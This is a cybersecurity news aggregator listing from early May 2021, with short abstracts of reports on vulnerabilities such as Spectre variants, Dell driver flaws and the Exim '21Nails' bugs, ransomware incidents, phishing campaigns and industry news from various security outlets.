Abstract When Spectre, a class of critical vulnerabilities impacting modern processors, was publicly revealed in January 2018, the researchers behind the discovery said, "As it is not easy to fix, it will haunt us for quite some time," explaining the inspiration behind naming the speculative execution attacks. Indeed, it's been more than three years, and there is no end to Spectre in sight. A team of academics from the University of Virginia and University of California, San Diego, has discovered a new line of attack that bypasses all current Spectre protections built into the chips, potentially putting almost every system — desktops, laptops, cloud servers, and smartphones — once again at risk just as they were three years ago. The disclosure of Spectre and Meltdown opened the floodgates of sorts, what with endless variants of the attacks coming to light in the intervening years, even as chipmakers like Intel, ARM, and AMD have continually scrambled to incorpo

The Hacker News

May 6, 2021 – General

Half of UK Manufacturers Suffered a Cyber-Attack Last Year Full Text

Abstract Make UK study shows more work is needed

Infosecurity Magazine

May 6, 2021 – Ransomware

Cyberattackers Behind Avaddon Ransomware Give Australia’s NSW Labor 240 Hours to Pay Ransom Full Text

Abstract Avaddon, which originated in Russia, is behind the breach and is threatening to release a trove of sensitive information including images of passports, driver’s licenses, and employment contracts.

Sydney Morning Herald

May 6, 2021 – Vulnerabilities

Malicious Office 365 Apps Are the Ultimate Insiders – Krebs on Security Full Text

Abstract These attacks begin with an emailed link that when clicked loads not a phishing site but the user’s actual Office 365 login page — whether that be at microsoft.com or their employer’s domain.

Krebs on Security

May 6, 2021 – Breach

East London Council Accidentally Exposes Thousands of Residents’ Email Addresses Full Text

Abstract A local authority in East London has committed a privacy blunder by emailing what appear to be thousands of residents – while forgetting to use the BCC field and exposing all of the email addresses.

The Register

May 6, 2021 – Malware

RaccoonStealer Malware Group Leaves Millions of Stolen Authentication Cookies Exposed in Unsecured Server Full Text

Abstract This type of malware infects devices and then collects user credentials from web browsers, FTP, and email clients, data that is later uploaded to command and control (C&C) servers.

The Record

May 5, 2021 – Phishing

BazarBackdoor phishing campaign eschews links and files to avoid raising red flags Full Text

Abstract SEGs and sandbox rules are designed to spot them, and employees are trained to distrust them, so attackers are taking an alternate approach.

SCMagazine

May 5, 2021 – Phishing

Feds Shut Down Fake COVID-19 Vaccine Phishing Website Full Text

Abstract ‘Freevaccinecovax.org’ claimed to be that of a biotech company but instead was stealing info from visitors to use for nefarious purposes.

Threatpost

May 5, 2021 – Malware

180+ OAuth 2.0 cloud malware apps detected Full Text

Abstract Cloud malware can be used to conduct reconnaissance, launch employee-to-employee attacks, and steal files and emails from cloud platforms.

SCMagazine

May 05, 2021 – Vulnerabilities

Cisco bugs allow creating admin accounts, executing commands as root Full Text

Abstract Cisco has fixed critical SD-WAN vManage and HyperFlex HX software security flaws that could enable remote attackers to execute commands as root or create rogue admin accounts.

BleepingComputer

May 5, 2021 – Policy and Law

IP or just generic tech? Palo Alto argues Centripetal patent claims are overly broad Full Text

Abstract The company claims a lawsuit filed against it by Centripetal Networks involves basic network security techniques and should be dismissed.

SCMagazine

May 05, 2021 – Vulnerabilities

VMware fixes critical RCE bug in vRealize Business for Cloud Full Text

Abstract VMware has released security updates to address a critical severity vulnerability in vRealize Business for Cloud that enables unauthenticated attackers to remotely execute malicious code on vulnerable servers.

BleepingComputer

May 5, 2021 – Criminals

UNC2529, a new sophisticated cybercrime gang that targets U.S. orgs with 3 malware Full Text

Abstract A new cybercrime gang, tracked as UNC2529, has targeted many organizations in the US and other countries using new sophisticated malware. A new financially motivated threat actor, tracked by FireEye Experts as UNC2529, has targeted many organizations...

Security Affairs

May 5, 2021 – Hacker

Homecoming Queen Hacker to be Tried as an Adult Full Text

Abstract Florida teen accused of hacking students’ accounts to rig homecoming contest to face felony charges as an adult

Infosecurity Magazine

May 5, 2021 – Malware

Panda Stealer Targets Crypto Wallets Full Text

Abstract Crypto wallets and Discord credentials among targets of new information stealer

Infosecurity Magazine

May 5, 2021 – General

Poor Working Relationships Between Security and Networking Teams Preventing Benefits of Digital Transformation Full Text

Abstract Nearly half of IT pros described a negative relationship between security and networking teams

Infosecurity Magazine

May 5, 2021 – Attack

Cyber-Attack on Belgian Parliament Full Text

Abstract Belgium’s parliament, universities, and police targeted in a coordinated DDoS attack

Infosecurity Magazine

May 5, 2021 – Government

NIST Seeks Input on HIPAA Security Rule Guidance Update Full Text

Abstract The National Institute of Standards and Technology is seeking public comment as it plans to update its 2008 guidance for implementing the HIPAA Security Rule, which went into effect 20 years ago.

Gov Info Security

May 05, 2021 – Vulnerabilities

New Study Warns of Security Threats Linked to Recycled Phone Numbers Full Text

Abstract A new academic study has highlighted a number of privacy and security pitfalls associated with recycling mobile phone numbers that could be abused to stage a variety of exploits, including account takeovers, phishing and spam attacks, and even preventing victims from signing up for online services. Nearly 66% of the recycled numbers that were sampled were found to be tied to previous owners' online accounts at popular websites, potentially enabling account hijacks by simply recovering the accounts tied to those numbers. "An attacker can cycle through the available numbers shown on online number change interfaces and check if any of them are associated with online accounts of previous owners," the researchers said. "If so, the attacker can then obtain these numbers and reset the password on the accounts, and receive and correctly enter the OTP sent via SMS upon login." The findings are part of an analysis of a sample of 259 phone numbers available to new su

The Hacker News

May 5, 2021 – General

Misconfigs and Unpatched Bugs Top Cloud Native Security Incidents Full Text

Abstract Snyk study claims automation is key to enhancing security

Infosecurity Magazine

May 5, 2021 – General

Cyber Defense Magazine – May 2021 has arrived. Enjoy it! Full Text

Abstract Cyber Defense Magazine March 2021 Edition has arrived. We hope you enjoy this month's edition…packed with over 90 pages of excellent content. Cyber Defense Magazine May 2021: over 90+ pages loaded with excellent content. Learn from the experts, cybersecurity...

Security Affairs

May 5, 2021 – General

Next gen tech: Most promising areas of emerging technology and innovation in cyber Full Text

Abstract As adversaries evolve their technique, so must the cyber industry. In this SC Awards Winners Circle roundtable discussion, SC Media speaks to cybersecurity leaders, and SC Award recipients, about the most compelling areas of technology for ensuring the protection of sensitive data and networks.

SCMagazine

May 5, 2021 – Vulnerabilities

Dell Fixes Twelve-Year-Old Driver Vulnerability Impacting Millions of PCs Full Text

Abstract Hundreds of millions of Dell desktops, laptops, notebooks, and tablets will need to update their Dell DBUtil driver to fix a 12-year-old vulnerability that exposes systems to attacks.

The Record

May 05, 2021 – Vulnerabilities

BIOS PrivEsc Bugs Affect Hundreds of Millions of Dell PCs Worldwide Full Text

Abstract PC maker Dell has issued an update to fix multiple critical privilege escalation vulnerabilities that went undetected since 2009, potentially allowing attackers to gain kernel-mode privileges and cause a denial-of-service condition. The issues, reported to Dell by researchers from SentinelOne on Dec. 1, 2020, reside in a firmware update driver named "dbutil_2_3.sys" that comes pre-installed on its devices. Hundreds of millions of desktops, laptops, notebooks, and tablets manufactured by the company are said to be vulnerable. "Dell dbutil_2_3.sys driver contains an insufficient access control vulnerability which may lead to escalation of privileges, denial-of-service, or information disclosure. Local authenticated user access is required," Dell said in an advisory. All five separate flaws have been assigned the CVE identifier CVE-2021-21551 with a CVSS score of 8.8. A breakdown of the shortcomings is as follows - CVE-2021-21551: Local Elevation Of Privilege

The Hacker News

May 5, 2021 – Phishing

Global Phishing Campaign Drops New Malware Trio Full Text

Abstract Mandiant warns financial crime group will be back

Infosecurity Magazine

May 5, 2021 – Vulnerabilities

Experts found critical authentication bypass flaw in HPE Edgeline Infrastructure Manager Full Text

Abstract Researchers found a critical vulnerability in HPE Edgeline Infrastructure Manager that could be exploited by a remote attacker to bypass authentication. Researchers from Tenable have disclosed a critical authentication bypass vulnerability in HPE Edgeline...

Security Affairs

May 5, 2021 – Vulnerabilities

Android May 2021 Update Out, Fixes Over 40 Vulnerabilities Full Text

Abstract The new security patch 2021-05-01 fixes three main critical flaws identified in the System component which could be exploited to run arbitrary code on a vulnerable Android device.

Softpedia

May 05, 2021 – Vulnerabilities

ALERT — New 21Nails Exim Bugs Expose Millions of Email Servers to Hacking Full Text

Abstract The maintainers of Exim have released patches to remediate as many as 21 security vulnerabilities in its software that could enable unauthenticated attackers to achieve complete remote code execution and gain root privileges. Collectively named '21Nails,' the flaws include 11 vulnerabilities that require local access to the server and 10 other weaknesses that could be exploited remotely. The issues were discovered by Qualys and reported to Exim on Oct. 20, 2020. "Some of the vulnerabilities can be chained together to obtain a full remote unauthenticated code execution and gain root privileges on the Exim Server," Bharat Jogi, senior manager at Qualys, said in public disclosure. "Most of the vulnerabilities discovered by the Qualys Research Team for e.g. CVE-2020-28017 affects all versions of Exim going back all the way to 2004." Exim is a popular mail transfer agent (MTA) used on Unix-like operating systems, with over 60% of the publicly reachable m

The Hacker News

May 5, 2021 – General

Shoppers Choose Guest Checkouts Over Security Fears Full Text

Abstract New study reveals major consumer mistrust of e-commerce brands

Infosecurity Magazine

May 5, 2021 – Botnet

New Cryptominer Spotted, Attacks Using Windows and Linux Bots Full Text

Abstract The Sysrv-hello cryptojacking botnet actively scans for vulnerable Windows and Linux enterprise servers and infects them with a Monero miner, as well as self-propagating malware payloads.

Cyware Alerts - Hacker News

May 5, 2021 – Malware

BazarLoader Downloader is Using Social Engineering Techniques Full Text

Abstract It has been discovered in two separate cyberattack campaigns. Both the campaigns employed unique social engineering techniques and popular products used in many organizations.

Cyware Alerts - Hacker News

May 4, 2021 – Phishing

Bait Boost: Phishers Delivering Increasingly Convincing Lures Full Text

Abstract An intense hunt for corporate account credentials will continue into next quarter, researchers predict.

Threatpost

May 4, 2021 – Vulnerabilities

21 vulnerabilities in Exim mail server leave web, cloud operations exposed Full Text

Abstract Researchers found 21 unique vulnerabilities in the Exim mail server, some of which can be chained together to obtain full remote unauthenticated code execution and gain root privileges.

SCMagazine

May 04, 2021 – Phishing

U.S. Agency for Global Media data breach caused by a phishing attack Full Text

Abstract The U.S. Agency for Global Media (USAGM) has disclosed a data breach that exposed the personal information of current and former employees and their beneficiaries.

BleepingComputer

May 4, 2021 – Education

Choose Your Own Adventure game animates security awareness training Full Text

Abstract Interactive modules educate employees on phishing, social engineering, securely working from home, and more. And it all comes with a dose of nostalgia.

SCMagazine

May 04, 2021 – General

Hillicon Valley: Five things to watch in Facebook Oversight Board ruling on Trump | Trump launches new communications tool after social media ban | Spotify urged to scrap speech recognition tech Full Text

Abstract Happy Tuesday! All eyes and ears and mice in the tech world will be watching Facebook’s Oversight Board tomorrow. The panel will be issuing its decision on whether former President Donald Trump should be allowed back on the platform after his suspension following the Jan. 6 Capitol insurrection.

The Hill

May 4, 2021 – Phishing

Global Phishing Attacks Spawn Three New Malware Strains Full Text

Abstract The never-seen malware strains have "professionally coded sophistication" and were launched by a well-resourced APT using nearly 50 domains, one hijacked.

Threatpost

May 4, 2021 – General

Software developers warm up to automated testing as security, cloud rise in importance Full Text

Abstract Developers are frustrated about the sluggish pace of testing code and are increasingly incorporating automation and machine learning to ease workloads.

SCMagazine

May 04, 2021 – Government

DOD expands bug disclosure program to all publicly accessible systems Full Text

Abstract US Department of Defense (DOD) officials today announced that the department's Vulnerability Disclosure Program (VDP) has been expanded to include all publicly accessible DOD websites and applications.

BleepingComputer

May 4, 2021 – Denial Of Service

A massive DDoS knocked offline Belgian government websites Full Text

Abstract A massive distributed denial of service (DDoS) attack shut down Belgium's government websites; internal networks were also impacted. A massive distributed denial of service (DDoS) attack hit most of the Belgian government’s IT network, according...

Security Affairs

May 04, 2021 – Vulnerabilities

Google Chrome adopts Windows 10 exploit protection feature Full Text

Abstract Google Chrome now hinders attackers' efforts to exploit security bugs on systems with Intel 11th Gen or AMD Zen 3 CPUs, running Windows 10 2004 or later.

BleepingComputer

May 4, 2021 – Vulnerabilities

Apple Fixes Zero‑Day Security Bugs Under Active Attack Full Text

Abstract On Monday, Apple released a quartet of unscheduled updates for iOS, macOS, and watchOS, slapping security patches on flaws in its WebKit browser engine.

Threatpost

May 4, 2021 – Vulnerabilities

Pulse Secure VPNs Get a Fix for Critical Zero-Day Bugs Full Text

Abstract The security flaw tracked as CVE-2021-22893 is being used by at least two APTs likely linked to China, to attack U.S. defense targets among others.

Threatpost

May 4, 2021 – Phishing

Fake Vaccine Domain Seized Full Text

Abstract Maryland US Attorney’s Office seizes domain name used in fake COVID-19 vaccine scam

Infosecurity Magazine

May 4, 2021 – Vulnerabilities

Most of Exim email servers could be hacked by exploiting 21Nails flaws Full Text

Abstract The maintainers of the Exim email server software addressed a collection of 21 issues, dubbed 21Nails, that can allow attackers to fully compromise mail servers. The maintainers of the Exim email server software have released security updates to address...

Security Affairs

May 4, 2021 – Attack

Telstra service provider hit by cyber attack as hackers claim SIM card information stolen Full Text

Abstract The victim, Melbourne-based Schepisi Communications, is a partner of Telstra that supplies phone numbers and cloud storage services on behalf of the telecommunications giant.

News.com.au

May 04, 2021 – Attack

Twilio discloses impact from Codecov supply-chain attack Full Text

Abstract Cloud communications company Twilio has now disclosed that the recent Codecov supply-chain attack exposed a small number of Twilio's customer email addresses.

BleepingComputer

May 4, 2021 – Business

JupiterOne nabs $30M to help companies manage cybersecurity data Full Text

Abstract JupiterOne, a cybersecurity management automation startup, today closed a $30 million Series B round led by Sapphire Ventures, with participation from previous investors Bain Capital Ventures.

Venture Beat

May 4, 2021 – Attack

Virgin Active SA Suffers Cyber-Attack Full Text

Abstract Virgin Active South Africa takes systems offline following cyber-attack

Infosecurity Magazine

May 4, 2021 – Vulnerabilities

Hundreds of Millions of Dell Users at Risk from Kernel-Privilege Bugs Full Text

Abstract The privilege-escalation bug remained hidden for 12 years and has been present in all Dell PCs, tablets and notebooks shipped since 2009.

Threatpost

May 4, 2021 – Phishing

Spearphishing Attack Uses COVID-21 Lure to Target Ukrainian Government Full Text

Abstract FortiGuard Labs has discovered yet another COVID-themed lure designed to compel unsuspecting victims to click on what appears to be an innocuous link that leads to a malicious zip file attachment.

Fortinet

May 4, 2021 – General

Third Parties Caused Data Breaches at 51% of Organizations Full Text

Abstract New research highlights weaknesses in third-party remote access security

Infosecurity Magazine

May 04, 2021 – Vulnerabilities

Critical 21Nails Exim bugs expose millions of servers to attacks Full Text

Abstract Newly discovered critical vulnerabilities in the Exim message transfer agent (MTA) software allow unauthenticated remote attackers to execute arbitrary code and gain root privilege on mail servers with default or common configurations.

BleepingComputer

May 4, 2021 – Business

Aryaka Networks buys Secucloud to offer a more secure network edge Full Text

Abstract The company said today that it has closed on a deal to buy German secure access service edge or SASE firm Secucloud GmbH. That company is now a fully owned subsidiary of Aryaka.

Silicon Angle

May 4, 2021 – Breach

Hacker leaks 150 million user records from Iranian Raychat app Full Text

Abstract The alleged data breach which has been seen and analyzed by Hackread.com includes full names, IP addresses, email addresses, Bcrypt passwords, Telegram messenger IDs, etc.

Hackread

May 4, 2021 – General

UK Cyber Security Association Officially Opens for Membership Full Text

Abstract The UK Cyber Security Association has officially launched, after being in an expressions of interest phase

Infosecurity Magazine

May 4, 2021 – Vulnerabilities

Hundreds of millions Of Dell PCs affected by CVE-2021-21551 flaws Full Text

Abstract American multinational computer technology giant Dell addresses a 12-year-old driver flaw, tracked as CVE-2021-21551, impacting millions of computers. Hundreds of millions of Dell computers worldwide are affected by a 12-year-old vulnerability, tracked...

Security Affairs

May 04, 2021 – Phishing

Worldwide phishing attacks deliver three new malware strains Full Text

Abstract A global-scale phishing campaign targeted worldwide organizations across a large array of industries with never-before-seen malware strains delivered via specially-tailored lures.

BleepingComputer

May 4, 2021 – Government

NSA Issues Guidance on Securing IT-OT Connectivity Full Text

Abstract The U.S. NSA last week released a cybersecurity advisory focusing on the security of operational technology (OT) systems, particularly in terms of connectivity to IT systems.

Security Week

May 04, 2021 – Malware

New Pingback Malware Using ICMP Tunneling to Evade C&C Detection Full Text

Abstract Researchers on Tuesday disclosed a novel malware that uses a variety of tricks to stay under the radar and evade detection, while stealthily capable of executing arbitrary commands on infected systems. Called 'Pingback,' the Windows malware leverages Internet Control Message Protocol (ICMP) tunneling for covert bot communications, allowing the adversary to utilize ICMP packets to piggyback attack code, according to an analysis published today by Trustwave. Pingback ("oci.dll") achieves this by getting loaded through a legitimate service called MSDTC (Microsoft Distributed Transaction Coordinator) — a component responsible for handling database operations that are distributed over multiple machines — by taking advantage of a method called DLL search order hijacking, which involves using a genuine application to preload a malicious DLL file. Naming the malware as one of the plugins required for supporting the Oracle ODBC interface in MSDTC is key to the atta

The Hacker News

May 4, 2021 – Ransomware

Scripps Health Knocked Offline by Ransomware Full Text

Abstract Healthcare non-profit postpones appointments after attack

Infosecurity Magazine

May 4, 2021 – Ransomware

Project Signal: a second Iranian State-Sponsored Ransomware Operation Full Text

Abstract An Iran-linked APT group carried out a ransomware operation through a contracting company based in the country, Flashpoint researchers warn. Researchers from Flashpoint have uncovered a state-sponsored ransomware campaign conducted by Iran’s Islamic...

Security Affairs

May 4, 2021 – Vulnerabilities

Dell patches vulnerable driver in a decade of IT products, computers and laptops Full Text

Abstract The five bugs, collectively cataloged as CVE-2021-21551, create privilege escalation and denial of service issues stemming from memory corruption, lack of authentication, and code logic flaws.

SCMagazine

May 04, 2021 – Vulnerabilities

Vulnerable Dell driver puts hundreds of millions of systems at risk Full Text

Abstract A driver that's been pushed for the past 12 years to Dell computer devices for consumers and enterprises contains multiple vulnerabilities that could lead to increased privileges on the system.

BleepingComputer

May 4, 2021 – Business

Acronis Raises $250 Million at $2.5 Billion Valuation Full Text

Abstract The funding, which brings the total raised by the company to more than $400 million, was led by CVC Capital Partners VII. Acronis announced achieving unicorn status in 2019 after raising $147 million.

Security Week

May 04, 2021 – General

How Should the Service Desk Reset Passwords? Full Text

Abstract Ask the average helpdesk technician what they do all day, and they will probably answer by saying that they reset passwords. Sure, helpdesk technicians do plenty of other things too, but in many organizations, a disproportionate number of helpdesk calls are tied to password resets. On the surface, having a helpdesk technician reset a user's password probably doesn't seem like a big deal. After all, the technician simply opens Active Directory Users and Computers, right-clicks on the user account, and chooses the Reset Password command from the shortcut menu. Resetting a password in this way is an easy process. Organizations can even opt to use an alternative tool such as the Windows Admin Center or even PowerShell if they prefer. One thing that most people probably don't stop and think about, however, is that even though the steps involved in the password reset process are simple enough, the process as a whole constitutes a major security risk. Security and the service desk Th

The Hacker News

May 4, 2021 – Vulnerabilities

Pulse Secure Patches Critical Zero-Day Flaw Full Text

Abstract CVSS 10.0 bug was exploited by multiple APT groups

Infosecurity Magazine

May 4, 2021 – Vulnerabilities

Apple addresses three zero-day flaws in its WebKit browser engine Full Text

Abstract Apple has released security updates to patch three zero-days in WebKit, Apple's browser engine, and fixed a zero-day exploited in the wild. Apple released security updates to address four zero-day vulnerabilities impacting WebKit, which is used...

Security Affairs

May 4, 2021 – General

A unified front: Effective, cooperative vendor-user relationships Full Text

Abstract What factors into a productive vendor-customer relationship? What are the perpetual challenges that emerge? In this SC Awards Winners Circle roundtable, we spoke to cybersecurity leaders, and SC Award winners, to break down the components of a vendor-user relationship that drive effective system security.

SCMagazine

May 04, 2021 – Malware

New Windows ‘Pingback’ malware uses ICMP for covert communication Full Text

Abstract Today, Trustwave researchers have disclosed their findings on a novel Windows malware sample that uses Internet Control Message Protocol (ICMP) for its command-and-control (C2) activities. Dubbed "Pingback," this malware targets Windows 64-bit systems, and uses DLL Hijacking to gain persistence.

BleepingComputer

May 4, 2021 – Business

Imperva acquires API security company CloudVector Full Text

Abstract Imperva today announced it plans to acquire application programming interface (API) security company CloudVector for an undisclosed sum to differentiate itself in the API protection market.

Venture Beat

May 04, 2021 – Vulnerabilities

Critical Patch Out for Critical Pulse Secure VPN 0-Day Under Attack Full Text

Abstract Ivanti, the company behind Pulse Secure VPN appliances, has released a security patch to remediate a critical security vulnerability that was found being actively exploited in the wild by at least two different threat actors. Tracked as CVE-2021-22893 (CVSS score 10), the flaw concerns "multiple use after free" issues in Pulse Connect Secure that could allow a remote unauthenticated attacker to execute arbitrary code and take control of the affected system. All Pulse Connect Secure versions prior to 9.1R11.4 are impacted. The flaw came to light on April 20 after FireEye disclosed a series of intrusions targeting defense, government, and financial organizations in the U.S. and elsewhere by leveraging critical vulnerabilities in the remote access solution to bypass multi-factor authentication protections and breach enterprise networks. The development prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an Emergency Directive urging fede

The Hacker News

May 4, 2021 – Ransomware

Suspected Iranian Ransomware Group Targets Israeli Firms Full Text

Abstract Report suggests “Networm” group has hit H&M Israel

Infosecurity Magazine

May 4, 2021 – Vulnerabilities

Apple Reports Two iOS Zero-day Vulnerabilities Actively Used in Attacks Full Text

Abstract A week after Apple issued the release of iOS 14.5, the company has released a new update to patch two zero-days that allowed attackers to execute malicious code on up-to-date devices.

Ars Technica

May 4, 2021 – Botnet

Massive Botnet Infected Internet TV Users, Now Taken Down Full Text

Abstract Dubbed the Pareto CTV botnet, the botnet consisted of almost a million infected Android devices and imitated the activity of millions of people watching ads on their smart devices.

Cyware Alerts - Hacker News

May 03, 2021 – Vulnerabilities

Apple Releases Urgent Security Patches For Zero‑Day Bugs Under Active Attacks Full Text

Abstract Apple on Monday released security updates for iOS, macOS, and watchOS to address three zero-day flaws and expand patches for a fourth vulnerability that the company said might have been exploited in the wild. The weaknesses all concern WebKit, the browser engine which powers Safari and other third-party web browsers in iOS, allowing an adversary to execute arbitrary code on target devices. A summary of the three security bugs is as follows: CVE-2021-30663: An integer overflow vulnerability that could be exploited to craft malicious web content, which may lead to code execution. The flaw was addressed with improved input validation. CVE-2021-30665: A memory corruption issue that could be exploited to craft malicious web content, which may lead to code execution. The flaw was addressed with improved state management. CVE-2021-30666: A buffer overflow vulnerability that could be exploited to craft malicious web content, which may lead to code execution. The flaw was addr

The Hacker News

May 03, 2021 – Ransomware

Health care giant Scripps Health hit by ransomware attack Full Text

Abstract Nonprofit health care provider Scripps Health in San Diego is currently dealing with a ransomware attack that forced the organization to suspend user access to its online portal and switch to alternative methods for patient care operations.

BleepingComputer

May 03, 2021 – General

Hillicon Valley: Facebook Oversight Board to rule on Trump ban Wednesday | Washington keeps close eye as Apple antitrust fight goes to court | Twitter expands Clubhouse-like feature Full Text

Abstract Happy Monday! Facebook’s Oversight Board said it will announce its decision on former President Donald Trump’s suspended accounts on Wednesday. In California, the antitrust trial between Apple and Epic Games kicked off, and it's expected to be closely watched in Washington amid mounting scrutiny over the market power of Silicon Valley giants. And Twitter announced it’s opening up its live audio room feature, Spaces, to more users.

The Hill

May 3, 2021 – Vulnerabilities

Expert released PoC exploit for Microsoft Exchange flaw Full Text

Abstract A security researcher released technical details and PoC code for a high-severity vulnerability in Microsoft Exchange Server reported by the NSA. A security expert released technical details and proof-of-concept exploit (PoC) code for the high-severity...

Security Affairs

May 3, 2021 – Vulnerabilities

Pulse Secure releases patch for zero-day used to target defense industrial base Full Text

Abstract Pulse Security said over the past couple of weeks it has worked closely with the Cybersecurity and Infrastructure Security Agency (CISA) as well as FireEye and Stroz Friedberg to investigate and respond quickly to the malicious activity that was identified on its customers’ systems.

SCMagazine

May 3, 2021 – Outage

Scripps Health Cyberattack Causes Widespread Hospital Outages Full Text

Abstract The San Diego-based hospital system diverted ambulances to other medical centers after a suspected ransomware attack.

Threatpost

May 03, 2021 – Vulnerabilities

Apple fixes 2 iOS zero-day vulnerabilities actively used in attacks Full Text

Abstract Today, Apple has released security updates that fix two actively exploited iOS zero-day vulnerabilities in the WebKit engine used by hackers to attack iPhones, iPads, iPods, macOS, and Apple Watch devices.

BleepingComputer

May 3, 2021 – Attack

New Attacks Slaughter All Spectre Defenses Full Text

Abstract The 3+ years computer scientists spent concocting ways to defend against these supply-chain attacks against chip architecture? It’s bound for the dustbin.

Threatpost

May 03, 2021 – Ransomware

N3TW0RM ransomware emerges in wave of cyberattacks in Israel Full Text

Abstract A new ransomware gang known as 'N3TW0RM' is targeting Israeli companies in a wave of cyberattacks starting last week.

BleepingComputer

May 3, 2021 – General

Hack the Capitol returns Tuesday, as all eyes look toward critical infrastructure security Full Text

Abstract SC Media talked about the event’s significance with organizer and founder of both Scythe and GRIMM, Bryson Bort.

SCMagazine

May 3, 2021 – APT

Naikon APT Group is Now Using Nebulae Backdoor Full Text

Abstract Researchers uncovered mischievous activities by the Naikon hacking group, which has been deploying a new backdoor against military organizations in Southeast Asia for over two years.

Cyware Alerts - Hacker News

May 3, 2021 – Malware

WeSteal Stealer and WeControl RAT - The New Commodity Malware in Town Full Text

Abstract Malware curators often peddle their creations in underground forums in creative ways. Now, a new malware is being shamelessly marketed as the leading way to make money in 2021.

Cyware Alerts - Hacker News

May 3, 2021 – Vulnerabilities

UNC2447 Exploiting SonicWall Zero-day to Breach Networks Full Text

Abstract A financially motivated threat group, tracked as UNC2447, was spotted exploiting a previously disclosed zero-day flaw in SonicWall’s Secure Mobile Access (SMA) appliances.

Cyware Alerts - Hacker News

May 3, 2021 – Malware

RotaJakiro Stayed Hidden for Several Years Full Text

Abstract A new backdoor in town is giving researchers a tough time by using a double encryption scheme, a combination of AES and XOR, to stay under the radar.

Cyware Alerts - Hacker News

May 3, 2021 – Ransomware

Ryuk Ransomware Operators have Updated their Attack Techniques Full Text

Abstract Security researchers from AdvIntel discovered that Ryuk ransomware attacks are now mostly using exposed RDP connections to gain an initial foothold inside a targeted network.

Cyware Alerts - Hacker News

May 3, 2021 – APT

Russia-Linked SVR APT Group Exploiting Five Known Vulnerabilities Full Text

Abstract A joint advisory by the FBI, CISA, and NSA disclosed that the Russian APT group is exploiting flaws in Fortinet, Zimbra, Citrix, Pulse Secure, and VMware solutions to obtain login credentials.

Cyware Alerts - Hacker News

May 3, 2021 – Vulnerabilities

Hewlett Packard Enterprise Plugs Critical Bug in Edge Platform Tool Full Text

Abstract Researchers warned that unpatched versions of HPE’s Edgeline Infrastructure Manager are open to remote authentication-bypass attacks.

Threatpost

May 3, 2021 – Breach

Codecov’s Code Coverage Tool Hacked Full Text

Abstract The attackers started to target Bash Uploader on January 31, when they modified the script to deliver the info from the customers’ environment to a server outside Codecov’s infrastructure.

Cyware Alerts - Hacker News

May 03, 2021 – Vulnerabilities

PoC exploit released for Microsoft Exchange bug discovered by NSA Full Text

Abstract Technical documentation and proof-of-concept exploit (PoC) code has been released for a high-severity vulnerability in Microsoft Exchange Server that could let remote attackers execute code on unpatched machines.

BleepingComputer

May 3, 2021 – Phishing

Magecart scammers aim at restaurants’ online delivery systems Full Text

Abstract The last six months have seen security breaches of five online ordering platforms, exposing some 343,000 payment cards, threat intelligence firm Gemini Advisory said on April 29.

Cyberscoop

May 03, 2021 – Outage

Alaska court system forced offline by cyberattack Full Text

Abstract The Alaska Court System (ACS) was forced to temporarily disconnect its online servers this week due to a cyberattack that installed malware on their systems, disrupting virtual court hearings. 

The Hill

May 03, 2021 – Breach

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys Full Text

Abstract Most mobile app users tend to blindly trust that the apps they download from app stores are safe and secure. But that isn't always the case. To demonstrate the pitfalls and identify vulnerabilities on a large scale, cybersecurity and machine intelligence company CloudSEK recently provided a platform called BeVigil where individuals can search and check app security ratings and other security issues before installing an app. A recent report shared with The Hacker News detailed how the BeVigil search engine identified over 40 apps - with more than a cumulative 100 million downloads - that had hardcoded private Amazon Web Services (AWS) keys embedded within them, putting their internal networks and their users' data at risk of cyberattacks. BeVigil finds popular apps leaking AWS keys: the AWS key leakage was spotted in some of the major apps such as Adobe Photoshop Fix, Adobe Comp, Hootsuite, IBM's Weather Channel, and online shopping services Club Factory and Wholee.

The Hacker News

May 3, 2021 – Breach

Contact Tracer Breach Hits the Keystone State Full Text

Abstract PHI of 72,000 Pennsylvanians exposed after Insight Global employees allegedly ignored security protocols

Infosecurity Magazine

May 3, 2021 – Government

How a Norwegian Government Report Shows the Limits of CFIUS Data Reviews Full Text

Abstract CFIUS forced a Chinese firm to sell Grindr in 2019. Yet the application is sharing data widely today, including to a company in China.

Lawfare

May 3, 2021 – Vulnerabilities

Pulse Secure fixes zero-day in Pulse Connect Secure (PCS) SSL VPN actively exploited Full Text

Abstract Pulse Secure has fixed a zero-day flaw in the Pulse Connect Secure (PCS) SSL VPN appliance that threat actors are actively exploiting in the wild. Pulse Secure has addressed a zero-day vulnerability (CVE-2021-22893) in the Pulse Connect Secure (PCS)...

Security Affairs

May 3, 2021 – Deepfake

Deepfake Attacks Are About to Surge, Experts Warn Full Text

Abstract New deepfake products and services are cropping up across the Dark Web.

Threatpost

May 03, 2021 – Vulnerabilities

Pulse Secure fixes VPN zero-day used to hack high-value targets Full Text

Abstract Pulse Secure has fixed a zero-day vulnerability in the Pulse Connect Secure (PCS) SSL VPN appliance that is being actively exploited to compromise the internal networks of defense firms and govt agencies.

BleepingComputer

May 3, 2021 – Phishing

DarkPath scam group loses 134 domains impersonating the WHO Full Text

Abstract United Nations security experts and security firm Group-IB said they worked together to take down 134 websites operated by a cybercrime group known as DarkPath that tricked users via a fake survey.

The Record

May 3, 2021 – Criminals

Online Child Abuse Platform with 400k Users Taken Down Full Text

Abstract Darknet CSAM site Boystown seized and alleged site operators arrested

Infosecurity Magazine

May 3, 2021 – Breach

Most Common Causes of Data Breach and How to Prevent It Full Text

Abstract Which are the most common causes of a data breach, and how can organizations prevent it? Data breaches are highly damaging and equally embarrassing for businesses and consumers. If you look at Verizon’s 2020 Data Breach Investigations...

Security Affairs

May 3, 2021 – Vulnerabilities

Tesla Car Hacked Remotely From Drone via Zero-Click Exploit Full Text

Abstract The attack, dubbed TBONE, involves the exploitation of two vulnerabilities affecting ConnMan to take full control of the infotainment system of a Tesla without any user interaction.

Security Week

May 3, 2021 – Privacy

US Mulling Domestic Spying Partnership with Private Companies Full Text

Abstract US president reportedly considering using private firms to spy on Americans’ online activity

Infosecurity Magazine

May 3, 2021 – Outage

Virgin Active goes offline after sophisticated cyberattack Full Text

Abstract Virgin Active SA says it was forced to go offline after being targeted by cybercriminals. Forensic experts are probing the extent of the attack to determine if any information was compromised.

Timeslive

May 3, 2021 – Malware

Hackers Abuse Excel 4.0 Macros to Deliver ZLoader and Quakbot Malware Full Text

Abstract The Excel macros are quite old, but hackers are targeting them because they provide paths to powerful functionality such as interaction with the operating system (OS).

GB Hackers

May 03, 2021 – General

